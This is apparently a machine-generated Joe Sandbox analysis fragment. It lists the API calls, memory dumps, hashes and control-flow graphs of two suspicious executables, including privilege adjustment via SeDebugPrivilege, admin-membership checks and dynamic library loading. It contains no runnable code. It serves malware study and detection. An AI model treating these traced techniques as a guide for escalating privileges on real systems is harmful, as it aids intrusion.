                                                                                      APIs
                                                                                      • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\IXDaI.exe), ref: 00EE13BC
                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00EE13DA
                                                                                      • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00EE1448
                                                                                        • Part of subcall function 00EE119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\IXDaI.exe,?,?,?,?,?,?,00EE13EF), ref: 00EE11AB
                                                                                        • Part of subcall function 00EE119F: OpenProcessToken.ADVAPI32(00000000,00000028,00EE13EF,?,?,?,?,?,?,00EE13EF), ref: 00EE11BB
                                                                                        • Part of subcall function 00EE119F: AdjustTokenPrivileges.ADVAPI32(00EE13EF,00000000,?,00000010,00000000,00000000), ref: 00EE11EB
                                                                                        • Part of subcall function 00EE119F: CloseHandle.KERNEL32(00EE13EF), ref: 00EE11FA
                                                                                        • Part of subcall function 00EE119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00EE13EF), ref: 00EE1203
                                                                                      Strings
                                                                                      • SeDebugPrivilege, xrefs: 00EE13D3
                                                                                      • C:\Users\user\AppData\Local\Temp\IXDaI.exe, xrefs: 00EE13A8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXDaI.exe$SeDebugPrivilege
                                                                                      • API String ID: 4123949106-3534422503
                                                                                      • Opcode ID: d8c36b65456c27bd87989c9d3690c2e20f3a68a17ba9a51b173c31de8af8e93a
                                                                                      • Instruction ID: 330c12855a4511834841d46bb7574ab85707bf6fb1a6e93a28718051ed088aa0
                                                                                      • Opcode Fuzzy Hash: d8c36b65456c27bd87989c9d3690c2e20f3a68a17ba9a51b173c31de8af8e93a
                                                                                      • Instruction Fuzzy Hash: 34313F71E0028DEADF20DBA78C45FEEBBB9EB44704F2051A9E515B7281D7709E85CB60
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00EE1334
                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00EE133B
                                                                                      • memset.MSVCRT ref: 00EE1359
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProcmemset
                                                                                      • String ID: NtSystemDebugControl$ntdll.dll
                                                                                      • API String ID: 3137504439-2438149413
                                                                                      • Opcode ID: 70b764407224bc7b20def9bd33653ca540d4b14f92237ce847d996444f7b5eaa
                                                                                      • Instruction ID: 4cadf7108263f384d91ffae2a644b1c28fc6f7b8cdd81e5a919ae8f875666b02
                                                                                      • Opcode Fuzzy Hash: 70b764407224bc7b20def9bd33653ca540d4b14f92237ce847d996444f7b5eaa
                                                                                      • Instruction Fuzzy Hash: CA01617160138DEFDB10DFA6ECC996FBBA8FB41318F0045AAF901B6181D3718645CA51
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: strrchr$lstrcmpilstrcpylstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 3636361484-0
                                                                                      • Opcode ID: 55853a4b870bae9fdfec7759bcfa638aba0103b6d5c64c623a53a5e5281637b3
                                                                                      • Instruction ID: fc0ef535b8d1ff9c3a2b26a0043c0d646ce380ac0503324650d8abd930171a1d
                                                                                      • Opcode Fuzzy Hash: 55853a4b870bae9fdfec7759bcfa638aba0103b6d5c64c623a53a5e5281637b3
                                                                                      • Instruction Fuzzy Hash: 1001DBB290429D6FDB105771EC49BD6779CDB04355F0400A5F945F70D0D6749EC88B90
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00EE1F92,00000000,?,00000000,?,?,?,00EE1F92,?,00000000,00000002), ref: 00EE1867
                                                                                      • srand.MSVCRT ref: 00EE1878
                                                                                      • rand.MSVCRT ref: 00EE1880
                                                                                      • srand.MSVCRT ref: 00EE1890
                                                                                      • rand.MSVCRT ref: 00EE1894
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: Timerandsrand$FileSystem
                                                                                      • String ID:
                                                                                      • API String ID: 4106363736-0
                                                                                      • Opcode ID: 2642ad4bc61ca2407615880a2ac2f72dfc57f85ab588cdbf806d71cb57705fcb
                                                                                      • Instruction ID: b15cc3d97747055e16dd7265c5c73c74eb2dd4e0cf7fa5568d2312bfc607482c
                                                                                      • Opcode Fuzzy Hash: 2642ad4bc61ca2407615880a2ac2f72dfc57f85ab588cdbf806d71cb57705fcb
                                                                                      • Instruction Fuzzy Hash: A4E01277A1021CBFD700A7BAEC8A99EBBACDF84161B110566F600E3254E574E9488AB4
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00EE603C
                                                                                      • GetProcAddress.KERNEL32(00000000,00EE6064), ref: 00EE604F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000011.00000002.1680075986.0000000000EE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00EE0000, based on PE: true
                                                                                      • Associated: 00000011.00000002.1679915421.0000000000EE0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679940751.0000000000EE1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000011.00000002.1680044207.0000000000EE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_17_2_ee0000_IXDaI.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: kernel32.dll
                                                                                      • API String ID: 1646373207-1793498882
                                                                                      • Opcode ID: 10e1df233e40018a47cfb3ab5d215ce3e8434dc6bff48eddd550e950aaa15cf6
                                                                                      • Instruction ID: 5b3c3c8e447bb7f6ecc54ee7819904778996317c2a43c1dd5fa04d8ec60a66a8
                                                                                      • Opcode Fuzzy Hash: 10e1df233e40018a47cfb3ab5d215ce3e8434dc6bff48eddd550e950aaa15cf6
                                                                                      • Instruction Fuzzy Hash: 49F0F0F11442DD8FEF70CEA5CC44BDE3BE4EB25754F50042AEA09DB281CB348A458B25

                                                                                      Execution Graph

                                                                                      Execution Coverage:1.4%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:4.2%
                                                                                      Total number of Nodes:119
                                                                                      Total number of Limit Nodes:21
                                                                                      execution_graph 30879 7ff70b8e5c50 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 30880 7ff70b8e8380 Sleep RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 30766 7ff70b8c64a0 30777 7ff70b93c230 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 30766->30777 30768 7ff70b8c6519 30770 7ff70b8c9a2a 30768->30770 30771 7ff70b8c7a9b 30768->30771 30772 7ff70b8ca0f0 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 30768->30772 30773 7ff70b945870 RtlRestoreThreadPreferredUILanguages 30768->30773 30778 7ff70b8c9ac0 RtlAllocateHeap RtlDeleteBoundaryDescriptor 30768->30778 30779 7ff70b922ba0 30768->30779 30784 7ff70b8d0050 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 30768->30784 30771->30768 30783 7ff70b922d70 ReadFile 30771->30783 30772->30768 30773->30768 30777->30768 30778->30768 30780 7ff70b922c10 30779->30780 30781 7ff70b922bc2 CreateFileW 30780->30781 30782 7ff70b922d54 30780->30782 30781->30780 30782->30768 30783->30771 30784->30768 30883 7ff70b8c5120 RtlRestoreThreadPreferredUILanguages 30847 7ff70b8eb6a0 11 API calls 30823 7ff70b9407d0 30827 7ff70b940819 30823->30827 30824 7ff70b941097 IsDlgButtonChecked 30824->30827 30825 7ff70b940bc2 IsDlgButtonChecked 30825->30827 30826 7ff70b94102b IsDlgButtonChecked 30826->30827 30827->30824 30827->30825 30827->30826 30828 7ff70b9413b0 30827->30828 30829 7ff70b9413d0 30830 7ff70b94141d 30829->30830 30831 7ff70b9413f0 IsDlgButtonChecked 30830->30831 30832 7ff70b94142d 30830->30832 30831->30830 30849 7ff70b93c1d0 RtlAllocateHeap RtlDeleteBoundaryDescriptor 30886 7ff70b8e5c50 RtlAllocateHeap 30730 7ff70b8d6a50 30737 7ff70b8ceb50 30730->30737 30732 7ff70b8d6b13 FindCloseChangeNotification 30733 7ff70b8d6a8e 30732->30733 30733->30732 30734 7ff70b8d6f9c CreateMutexExA 30733->30734 30735 7ff70b8d6fc7 30733->30735 30742 7ff70b945870 30733->30742 30734->30733 30738 7ff70b8ceba2 30737->30738 30739 7ff70b8cc400 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 30738->30739 30740 7ff70b945750 RtlAllocateHeap 30738->30740 30741 7ff70b8cf1b0 30738->30741 30739->30738 30740->30738 30741->30733 30743 7ff70b945890 30742->30743 30744 7ff70b945bed RtlRestoreThreadPreferredUILanguages 30743->30744 30745 7ff70b945c2f 30743->30745 30744->30743 30745->30733 30854 7ff70b8eb1d0 IsDlgButtonChecked IsDlgButtonChecked IsDlgButtonChecked 30856 7ff70b8c5ac0 15 API calls 30801 7ff70b923030 30803 7ff70b92306d 30801->30803 30802 7ff70b945870 RtlRestoreThreadPreferredUILanguages 30802->30803 30803->30802 30804 7ff70b9232a7 FindCloseChangeNotification 30803->30804 30805 7ff70b9234f5 30803->30805 30807 7ff70b924370 RtlRestoreThreadPreferredUILanguages 30803->30807 30804->30803 30807->30803 30808 7ff70b91e430 30815 7ff70b945750 30808->30815 30810 7ff70b91e475 30812 7ff70b91f30c 30810->30812 30819 7ff70b945c40 30810->30819 30813 7ff70b945870 RtlRestoreThreadPreferredUILanguages 30812->30813 30814 7ff70b91f31b 30813->30814 30816 7ff70b9457ac 30815->30816 30817 7ff70b945790 RtlAllocateHeap 30816->30817 30818 7ff70b9457bc 30816->30818 30817->30816 30818->30810 30820 7ff70b945c8f 30819->30820 30821 7ff70b945c70 RtlAllocateHeap 30820->30821 30822 7ff70b945c9f 30820->30822 30821->30820 30822->30810 30862 7ff70b93f5b0 OpenProcessToken 30863 7ff70b948ab0 6 API calls 30746 7ff70b8d4970 30748 7ff70b8d4a1c 30746->30748 30747 7ff70b8d4a0b SleepEx 30747->30748 30748->30747 30750 7ff70b8d4bc4 30748->30750 30751 7ff70b922f40 30748->30751 30752 7ff70b922f74 30751->30752 30753 7ff70b922f60 GetFileAttributesA 30752->30753 30754 7ff70b922f84 30752->30754 30753->30752 30754->30748 30785 7ff70b8e58dc 30786 7ff70b8e58e8 30785->30786 30790 7ff70b8e5870 30786->30790 30792 7ff70b8ef570 RtlAllocateHeap RtlRestoreThreadPreferredUILanguages 30786->30792 30788 7ff70b8e5a7d 30793 7ff70b90b3e0 30788->30793 30792->30788 30794 7ff70b90b40f 30793->30794 30795 7ff70b8e5a9c 30794->30795 30797 7ff70b945680 30794->30797 30798 7ff70b9456a6 30797->30798 30799 7ff70b945707 RtlAllocateHeap 30798->30799 30800 7ff70b945736 30798->30800 30799->30798 30800->30794 30833 7ff70b93f310 30834 7ff70b93f340 30833->30834 30835 7ff70b93f430 CheckTokenMembership 30834->30835 30836 7ff70b93f4a1 30834->30836 30837 7ff70b93f388 AllocateAndInitializeSid 30834->30837 30835->30834 30837->30834 30868 7ff70b8e8380 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 30721 7ff70b8de810 30728 7ff70b8de89c 30721->30728 30722 7ff70b8e3648 LoadLibraryA 30722->30728 30723 7ff70b8e25e1 LoadLibraryA 30723->30728 30724 7ff70b8e33eb LoadLibraryA 30724->30728 30725 7ff70b8e2c14 LoadLibraryA 30725->30728 30727 7ff70b8e3a9f 30728->30722 30728->30723 30728->30724 30728->30725 30728->30727 30729 7ff70b93fa00 RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 30728->30729 30729->30728 30755 7ff70b8e5d0b 30756 7ff70b8e5f49 30755->30756 30759 7ff70b8e5c80 30755->30759 30756->30759 30761 7ff70b93ff60 30756->30761 30757 7ff70b8e78f6 30759->30757 30765 7ff70b8ed030 RtlAllocateHeap 30759->30765 30764 7ff70b93ffa7 30761->30764 30762 7ff70b9402fe FindWindowW 30762->30764 30763 7ff70b9404bf 30763->30759 30764->30762 30764->30763 30765->30759 30910 7ff70b937267 RtlDeleteBoundaryDescriptor 30914 7ff70b933e70 LoadLibraryW RtlAllocateHeap RtlDeleteBoundaryDescriptor RtlRestoreThreadPreferredUILanguages 30838 7ff70b8e88f7 30840 7ff70b8e92d0 30838->30840 30844 7ff70b8e8380 30838->30844 30839 7ff70b8ea52d 30840->30839 30841 7ff70b8e930c LoadLibraryW 30840->30841 30840->30844 30841->30844 30842 7ff70b945870 RtlRestoreThreadPreferredUILanguages 30842->30844 30843 7ff70b945750 RtlAllocateHeap 30843->30844 30844->30842 30844->30843
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !@X$!@X$#{j$#{j$29K&$29K&$29K&$5no$5no$GSw'$GSw'$LK@f$LK@f$SQ>$SQ>$SQ>$SQ>$U8PB$U8PB$U8PB$U8PB$U8PB$b~D+$c$&o$c$&o$cpHi$cpHi$c~D+$c~D+$d6M $dfb$dfb$dl!$dl!$e6M $e6M $e6M $g1E$hTw*$hTw*$mF$nF$nF$u|$u|$v'Hu$v'Hu$xl$yl$yl$yl${3\M${F"7$|3\M$|3\M$pcR
                                                                                      • API String ID: 0-1998008778
                                                                                      • Opcode ID: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
                                                                                      • Instruction ID: 914b0d82b878aa05db199ca5afabf1846457c7ed7d08c3687bb014f50fa21fd0
                                                                                      • Opcode Fuzzy Hash: 9a2ff04d6d200e89dbdb88af5bdf8fed4f97cd62d83c3a83ade47878a07dfed0
                                                                                      • Instruction Fuzzy Hash: F383C821A086C6C9FB786B689CA4BBD6391EF44309F90443BC61F8BBF4CF2857518795

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1702 7ff70b93f310-7ff70b93f33e 1703 7ff70b93f360-7ff70b93f366 1702->1703 1704 7ff70b93f36c-7ff70b93f372 1703->1704 1705 7ff70b93f420-7ff70b93f426 1703->1705 1706 7ff70b93f340-7ff70b93f35f 1704->1706 1707 7ff70b93f374-7ff70b93f37a 1704->1707 1708 7ff70b93f428-7ff70b93f42e 1705->1708 1709 7ff70b93f47c-7ff70b93f490 1705->1709 1706->1703 1710 7ff70b93f46a-7ff70b93f477 1707->1710 1711 7ff70b93f380-7ff70b93f386 1707->1711 1712 7ff70b93f430-7ff70b93f465 CheckTokenMembership 1708->1712 1713 7ff70b93f495-7ff70b93f49b 1708->1713 1709->1703 1710->1703 1711->1703 1716 7ff70b93f388-7ff70b93f40c AllocateAndInitializeSid 1711->1716 1712->1703 1713->1703 1714 7ff70b93f4a1-7ff70b93f4b5 1713->1714 1716->1703
                                                                                      APIs
                                                                                      • AllocateAndInitializeSid.KERNELBASE ref: 00007FF70B93F3E6
                                                                                      • CheckTokenMembership.KERNELBASE(?,?,?,?,?,?,?,?,F4EB9223,?,0645EEAE8F7DAD8E,1063196CE2D18368,?,?,00007FF70B8DB07B), ref: 00007FF70B93F442
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateCheckInitializeMembershipToken
                                                                                      • String ID:
                                                                                      • API String ID: 1663163955-0
                                                                                      • Opcode ID: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
                                                                                      • Instruction ID: e46689e96cec34980da7c5411dd2b95174e731a15d87bb1ae3ddb29310716a1c
                                                                                      • Opcode Fuzzy Hash: 8819bed3663e1e96ee0d00ee15cf93aa921c6ea50412d524142ccb894634a248
                                                                                      • Instruction Fuzzy Hash: AB31B67191C741C7E6249B19E8A43AEB7A0FB84B80F500039EA8E46BB8DF7CD5488B00

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1141 7ff70b9407d0-7ff70b940817 1142 7ff70b940829-7ff70b94083b 1141->1142 1143 7ff70b940841-7ff70b940848 1142->1143 1144 7ff70b9408d0-7ff70b9408d7 1142->1144 1147 7ff70b94084e-7ff70b940855 1143->1147 1148 7ff70b940940-7ff70b940947 1143->1148 1145 7ff70b9408dd-7ff70b9408e4 1144->1145 1146 7ff70b9409d0-7ff70b9409d7 1144->1146 1151 7ff70b9408ea-7ff70b9408f1 1145->1151 1152 7ff70b940a9c-7ff70b940aa3 1145->1152 1149 7ff70b940b5e-7ff70b940b65 1146->1149 1150 7ff70b9409dd-7ff70b9409e4 1146->1150 1155 7ff70b940a48-7ff70b940a4f 1147->1155 1156 7ff70b94085b-7ff70b940862 1147->1156 1153 7ff70b940b07-7ff70b940b0e 1148->1153 1154 7ff70b94094d-7ff70b940954 1148->1154 1163 7ff70b940e3a-7ff70b940e41 1149->1163 1164 7ff70b940b6b-7ff70b940b72 1149->1164 1159 7ff70b9409ea-7ff70b9409f1 1150->1159 1160 7ff70b940d09-7ff70b940d10 1150->1160 1161 7ff70b9408f7-7ff70b9408fe 1151->1161 1162 7ff70b940c32-7ff70b940c39 1151->1162 1169 7ff70b940aa9-7ff70b940ab0 1152->1169 1170 7ff70b940d8f-7ff70b940da3 1152->1170 1157 7ff70b940ddd-7ff70b940de4 1153->1157 1158 7ff70b940b14-7ff70b940b1b 1153->1158 1167 7ff70b94095a-7ff70b940961 1154->1167 1168 7ff70b940c8f-7ff70b940c96 1154->1168 1165 7ff70b940d5f-7ff70b940d66 1155->1165 1166 7ff70b940a55-7ff70b940a5c 1155->1166 1171 7ff70b940ba8-7ff70b940baf 1156->1171 1172 7ff70b940868-7ff70b94086f 1156->1172 1175 7ff70b940dea-7ff70b940dfd 1157->1175 1176 7ff70b941331-7ff70b94133f 1157->1176 1177 7ff70b941147-7ff70b941151 1158->1177 1178 7ff70b940b21-7ff70b940b28 1158->1178 1193 7ff70b9409f7-7ff70b9409fe 1159->1193 1194 7ff70b940fd2-7ff70b940fee 1159->1194 1195 7ff70b9412a2-7ff70b9412b0 1160->1195 1196 7ff70b940d16-7ff70b940d29 1160->1196 1181 7ff70b940904-7ff70b94090b 1161->1181 1182 7ff70b940f13-7ff70b940f3e 1161->1182 1189 7ff70b941229-7ff70b941253 1162->1189 1190 7ff70b940c3f-7ff70b940c52 1162->1190 1179 7ff70b940e47-7ff70b940e5a 1163->1179 1180 7ff70b94138d 1163->1180 1183 7ff70b940b78-7ff70b940b7f 1164->1183 1184 7ff70b94116b-7ff70b941181 1164->1184 1199 7ff70b940d6c-7ff70b940d7f 1165->1199 1200 7ff70b941313-7ff70b94132c 1165->1200 1197 7ff70b940a62-7ff70b940a69 1166->1197 1198 7ff70b94100f-7ff70b941026 1166->1198 1185 7ff70b940f8a-7ff70b940fa3 1167->1185 1186 7ff70b940967-7ff70b94096e 1167->1186 1191 7ff70b941258-7ff70b941287 1168->1191 1192 7ff70b940c9c-7ff70b940caf 1168->1192 1201 7ff70b941097-7ff70b9410fb IsDlgButtonChecked 1169->1201 1202 7ff70b940ab6-7ff70b940abd 1169->1202 1170->1142 1203 7ff70b940da9-7ff70b940dbc 1170->1203 1187 7ff70b94121f-7ff70b941224 1171->1187 1188 7ff70b940bb5-7ff70b940bbc 1171->1188 1173 7ff70b940e6a-7ff70b940e9d 1172->1173 1174 7ff70b940875-7ff70b94087c 1172->1174 1233 7ff70b940e9f 1173->1233 1234 7ff70b940ea4-7ff70b940ece 1173->1234 1227 7ff70b940882-7ff70b940895 1174->1227 1228 7ff70b940ed3-7ff70b940f0e 1174->1228 1175->1142 1229 7ff70b940e03-7ff70b940e2d 1175->1229 1220 7ff70b941341 1176->1220 1221 7ff70b941346-7ff70b941388 1176->1221 1204 7ff70b941157-7ff70b94115c 1177->1204 1205 7ff70b940820-7ff70b940826 1177->1205 1210 7ff70b940b2e-7ff70b940b41 1178->1210 1211 7ff70b941161-7ff70b941166 1178->1211 1179->1142 1230 7ff70b940e60 1179->1230 1218 7ff70b941397-7ff70b9413aa 1180->1218 1231 7ff70b940f4d-7ff70b940f71 1181->1231 1232 7ff70b940911-7ff70b940924 1181->1232 1235 7ff70b940f40 1182->1235 1236 7ff70b940f45-7ff70b940f48 1182->1236 1214 7ff70b9411dc-7ff70b94121a 1183->1214 1215 7ff70b940b85-7ff70b940b98 1183->1215 1208 7ff70b941188-7ff70b9411d7 1184->1208 1209 7ff70b941183 1184->1209 1185->1205 1237 7ff70b940fa8-7ff70b940fcd 1186->1237 1238 7ff70b940974-7ff70b940987 1186->1238 1187->1205 1188->1218 1219 7ff70b940bc2-7ff70b940c27 IsDlgButtonChecked 1188->1219 1189->1205 1190->1142 1222 7ff70b940c58-7ff70b940c8a 1190->1222 1212 7ff70b941289 1191->1212 1213 7ff70b94128f-7ff70b94129d 1191->1213 1192->1142 1223 7ff70b940cb5-7ff70b940cd8 1192->1223 1239 7ff70b940a04-7ff70b940a17 1193->1239 1240 7ff70b940ff3-7ff70b94100a 1193->1240 1194->1205 1216 7ff70b9412b7-7ff70b94130e 1195->1216 1217 7ff70b9412b2 1195->1217 1196->1142 1224 7ff70b940d2f-7ff70b940d5a 1196->1224 1241 7ff70b94102b-7ff70b94108f IsDlgButtonChecked 1197->1241 1242 7ff70b940a6f-7ff70b940a82 1197->1242 1198->1205 1199->1142 1225 7ff70b940d85-7ff70b940d8a 1199->1225 1200->1205 1243 7ff70b940819-7ff70b94081b 1201->1243 1244 7ff70b941101-7ff70b941106 1201->1244 1206 7ff70b94110b-7ff70b94112d 1202->1206 1207 7ff70b940ac3-7ff70b940ad6 1202->1207 1203->1142 1226 7ff70b940dc2-7ff70b940dd8 1203->1226 1204->1205 1205->1142 1260 7ff70b94112f 1206->1260 1261 7ff70b941135-7ff70b941142 1206->1261 1207->1142 1245 7ff70b940adc-7ff70b940b02 1207->1245 1208->1142 1209->1208 1210->1142 1246 7ff70b940b47-7ff70b940b59 1210->1246 1211->1205 1212->1213 1213->1205 1214->1205 1215->1142 1247 7ff70b940b9e-7ff70b940ba3 1215->1247 1216->1205 1217->1216 1218->1142 1249 7ff70b9413b0-7ff70b9413c9 1218->1249 1219->1243 1248 7ff70b940c2d 1219->1248 1220->1221 1221->1142 1222->1205 1250 7ff70b940cda 1223->1250 1251 7ff70b940cdf-7ff70b940d04 1223->1251 1224->1205 1225->1205 1226->1205 1227->1142 1252 7ff70b940897-7ff70b9408bf 1227->1252 1228->1205 1229->1163 1230->1173 1255 7ff70b940f79-7ff70b940f85 1231->1255 1256 7ff70b940f73 1231->1256 1232->1142 1253 7ff70b94092a-7ff70b94093b 1232->1253 1233->1234 1234->1205 1235->1236 1236->1205 1237->1205 1238->1142 1254 7ff70b94098d-7ff70b9409c1 1238->1254 1239->1142 1257 7ff70b940a1d-7ff70b940a43 1239->1257 1240->1205 1241->1243 1258 7ff70b941095 1241->1258 1242->1142 1259 7ff70b940a88-7ff70b940a97 1242->1259 1243->1205 1244->1243 1245->1142 1246->1205 1247->1205 1248->1244 1250->1251 1251->1205 1252->1205 1253->1205 1254->1205 1255->1205 1256->1255 1257->1205 1258->1244 1259->1205 1260->1261 1261->1205
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000018.00000002.2191927195.00007FF70B8C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF70B8C0000, based on PE: true
                                                                                      • Associated: 00000018.00000002.2191829568.00007FF70B8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2191992181.00007FF70B94D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000018.00000002.2192112099.00007FF70B9B2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_24_2_7ff70b8c0000_F6D9.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: gFW$gFW$gFW$dT$dT$dT
                                                                                      • API String ID: 0-1908915228
                                                                                      • Opcode ID: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
                                                                                      • Instruction ID: 806b10a3e727d4b9b719b08a3a13024116f10ecb0080d16a6e08ddb766737cb2
                                                                                      • Opcode Fuzzy Hash: eafbd65168f323bf9e7e5de3815a97b5dcd0c1b3a076008004ab08978d9d03a7
                                                                                      • Instruction Fuzzy Hash: 7F42A232B1CBC5C5DA745709F940BAAA691EBC9790F50413ACF8E87BA4CFBCD5809B50

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
